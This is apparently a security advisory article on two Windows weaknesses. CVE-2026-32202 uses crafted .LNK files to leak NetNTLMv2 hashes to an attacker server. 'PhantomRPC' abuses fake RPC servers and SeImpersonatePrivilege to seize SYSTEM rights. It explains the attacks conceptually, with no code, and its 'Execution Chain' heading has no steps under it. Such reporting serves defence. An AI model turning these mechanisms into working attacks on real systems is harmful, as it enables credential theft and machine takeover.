As traditional security defences improve, advanced threat actors are increasingly targeting foundational architectural components within the Microsoft Windows operating system. Two recent vulnerabilities—CVE-2026-32202 and an unpatched flaw known as "PhantomRPC"—highlight this shift. Attackers are using logical flaws and protocol abuses to achieve stealthy initial access and rapid privilege escalation.
Vulnerability permits unauthenticated attackers to execute zero-click network spoofing and NT LAN Manager (NTLM) authentication coercion via specially crafted Shortcut (.LNK) files. Discovered as the byproduct of an incomplete patch for an earlier zero-day remote code execution (RCE) flaw (CVE-2026-21510), this residual vulnerability has been actively exploited in the wild. The Russian state-sponsored threat group APT28 has heavily weaponised this vulnerability within sophisticated cyber espionage campaigns targeting government, military, and critical infrastructure.
Attackers send a maliciously crafted Shortcut (.LNK) file. When a victim simply opens the folder containing this file, Windows Explorer automatically attempts to load the file's icon. This triggers a background network connection (SMB) to an attacker-controlled server without requiring any user interaction (zero-click).
This background connection leaks the victim's NetNTLMv2 authentication hash. Threat actors can capture this hash to crack passwords offline or perform NTLM relay attacks, allowing them to immediately authenticate to other internal network systems as the victimised user.
Execution Chain
The exploitation sequence proceeds autonomously in the background:
The official remediation introduced a new Component Object Model (COM) object, designated ControlPanelLinkSite. This object was explicitly engineered to act as a security gate, enforcing SmartScreen verification via the ShellExecuteExW function before any remote code could be loaded and executed.
PhantomRPC constitutes a fundamental and currently unpatched architectural flaw in the Windows Remote Procedure Call (RPC) subsystem. By abusing endpoint mapping mechanisms and the inherent nature of service unavailability, local attackers possessing the SeImpersonatePrivilege can deploy fraudulent RPC servers.
Windows allows background processes to communicate via RPC; if a legitimate Windows service is temporarily unavailable, the system fails to verify the authenticity of a replacement server. An attacker with limited local access can deploy a "phantom" RPC server that mimics the missing service.
When a highly privileged system process (like SYSTEM) attempts to contact the missing service, it connects to the attacker's fake server instead. Using the SeImpersonatePrivilege (a right commonly held by default service accounts), the attacker instantly steals the incoming SYSTEM identity, gaining full control over the machine.
Microsoft considers this an "intended architectural behaviour" rather than a bug because it requires SeImpersonatePrivilege to execute. Consequently, they have not assigned a CVE and do not plan to issue a patch.
